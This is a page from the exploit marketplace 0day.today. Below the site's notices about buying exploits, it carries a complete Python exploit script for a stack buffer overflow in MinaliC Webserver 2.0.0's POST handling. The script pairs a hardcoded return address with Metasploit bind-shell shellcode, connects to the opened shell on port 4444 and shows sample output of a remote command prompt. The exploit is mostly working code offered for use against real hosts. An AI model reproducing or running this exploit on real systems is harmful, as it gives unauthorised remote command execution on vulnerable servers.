0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MinaliC Webserver 2.0.0 Buffer Overflow Vulnerability
[#!/usr/bin/env python
# Title : MinaliC Webserver 2.0.0 Post Method Remote Command Execution
# (Works for Windows Server 2003 sp2 Only)
#
# Date: 12 Apr 2013
#
# Exploit Author: Antonius - (http://www.cr0security.com - http://www.codewall-security.com)
#
# Thanks : http://www.offensive-security.com , http://www.security-hooligan.com, http://www.techorganic.com & Indonesian Backtrack Team
#
# Vendor Homepage: http://minalic.sourceforge.net
#
# Version: MinaliC Webserver 2.0.0
#
# Tested on: Windows Server 2003 Service Pack 2, English
#
# Description:
# Stack based buffer overflow occur when minalic 2.0.0 handles http post method. This exploit tested and works on windows server 2003 sp2 only.
# Exploitation will failed if specify wrong path
# Usage : ./exploit.py ip_address minalic_bin_path
#cr0security@cr0security-Vostro1310:~/Desktop/ctp_exercise/working_exploit$ python exploit.py 192.168.1.2 'c:\minalic\bin'
#Sending Exploit Please Wait
#Trying 192.168.1.2...
#Connected to 192.168.1.2.
#Escape character is '^]'.
#Microsoft Windows [Version 5.2.3790]
#(C) Copyright 1985-2003 Microsoft Corp.
#C:\minalic\bin>
import socket, struct,os, sys, time
if len(sys.argv) < 2 :
print "MinaliC Webserver Post Method Remote Command Execution (Works for Windows Server 2003 sp2 Only)"
print "Usage : ./exploit.py 'ip address' 'path of minalic binary'"
print "Example : python exploit.py 192.168.1.2 'c:\minalic\bin'"
sys.exit(1)
ip = sys.argv[1]
if len(sys.argv) > 2 :
path_length = len(sys.argv[2])
path = sys.argv[2]
else :
path_length = 14
if path_length > 14 :
#if path not at C:\minalic\bin we must recalculate preceed length to overwrite eip
junk = "\x90" * (240 - (len(path) - 14))
else :
#default path at C:\minalic\bin
junk = "\x90" * 240
#only have 4 bytes, jmp for more
first_stage = "\xeb\xd0" + "\x90" * 2
#ecx points to our controlled buffer, so we do a jmp to ecx
second_stage = "\x83\xc1\x04\xff\xe1"
sec2 = junk + second_stage
#0x7C86A01B jmp esp from ntdll.dll on windows server 2003
ret = "\x1B\xA0\x86\x7C"
host = "\xff" * 140
# metasploit windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=127.0.0.1,
shellcode = ("\xbd\x78\x69\xd9\xaa\xd9\xc0\xd9\x74\x24\xf4\x58\x2b\xc9" +
"\xb1\x56\x83\xe8\xfc\x31\x68\x0f\x03\x68\x77\x8b\x2c\x56" +
"\x6f\xc2\xcf\xa7\x6f\xb5\x46\x42\x5e\xe7\x3d\x06\xf2\x37" +
"\x35\x4a\xfe\xbc\x1b\x7f\x75\xb0\xb3\x70\x3e\x7f\xe2\xbf" +
"\xbf\xb1\x2a\x13\x03\xd3\xd6\x6e\x57\x33\xe6\xa0\xaa\x32" +
"\x2f\xdc\x44\x66\xf8\xaa\xf6\x97\x8d\xef\xca\x96\x41\x64" +
"\x72\xe1\xe4\xbb\x06\x5b\xe6\xeb\xb6\xd0\xa0\x13\xbd\xbf" +
"\x10\x25\x12\xdc\x6d\x6c\x1f\x17\x05\x6f\xc9\x69\xe6\x41" +
"\x35\x25\xd9\x6d\xb8\x37\x1d\x49\x22\x42\x55\xa9\xdf\x55" +
"\xae\xd3\x3b\xd3\x33\x73\xc8\x43\x90\x85\x1d\x15\x53\x89" +
"\xea\x51\x3b\x8e\xed\xb6\x37\xaa\x66\x39\x98\x3a\x3c\x1e" +
"\x3c\x66\xe7\x3f\x65\xc2\x46\x3f\x75\xaa\x37\xe5\xfd\x59" +
"\x2c\x9f\x5f\x36\x81\x92\x5f\xc6\x8d\xa5\x2c\xf4\x12\x1e" +
"\xbb\xb4\xdb\xb8\x3c\xba\xf6\x7d\xd2\x45\xf8\x7d\xfa\x81" +
"\xac\x2d\x94\x20\xcc\xa5\x64\xcc\x19\x69\x35\x62\xf1\xca" +
"\xe5\xc2\xa1\xa2\xef\xcc\x9e\xd3\x0f\x07\xa9\xd3\xc1\x73" +
"\xfa\xb3\x23\x84\xed\x1f\xad\x62\x67\xb0\xfb\x3d\x1f\x72" +
"\xd8\xf5\xb8\x8d\x0a\xaa\x11\x1a\x02\xa4\xa5\x25\x93\xe2" +
"\x86\x8a\x3b\x65\x5c\xc1\xff\x94\x63\xcc\x57\xde\x5c\x87" +
"\x22\x8e\x2f\x39\x32\x9b\xc7\xda\xa1\x40\x17\x94\xd9\xde" +
"\x40\xf1\x2c\x17\x04\xef\x17\x81\x3a\xf2\xce\xea\xfe\x29" +
"\x33\xf4\xff\xbc\x0f\xd2\xef\x78\x8f\x5e\x5b\xd5\xc6\x08" +
"\x35\x93\xb0\xfa\xef\x4d\x6e\x55\x67\x0b\x5c\x66\xf1\x14" +
"\x89\x10\x1d\xa4\x64\x65\x22\x09\xe1\x61\x5b\x77\x91\x8e" +
"\xb6\x33\xa1\xc4\x9a\x12\x2a\x81\x4f\x27\x37\x32\xba\x64" +
"\x4e\xb1\x4e\x15\xb5\xa9\x3b\x10\xf1\x6d\xd0\x68\x6a\x18" +
"\xd6\xdf\x8b\x09")
agent = "User-Agent: " + "\x90" * (898 - len(shellcode)) + shellcode
payload = "POST /" + sec2 + ret + first_stage + " HTTP/1.1\r\n" + "Host: " + host + "\r\n" + agent + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 8080))
s.send(payload)
s.close()
print "Sending Exploit Please Wait"
time.sleep(15)
os.system("telnet " + ip + " 4444")
# 0day.today [2024-11-15] #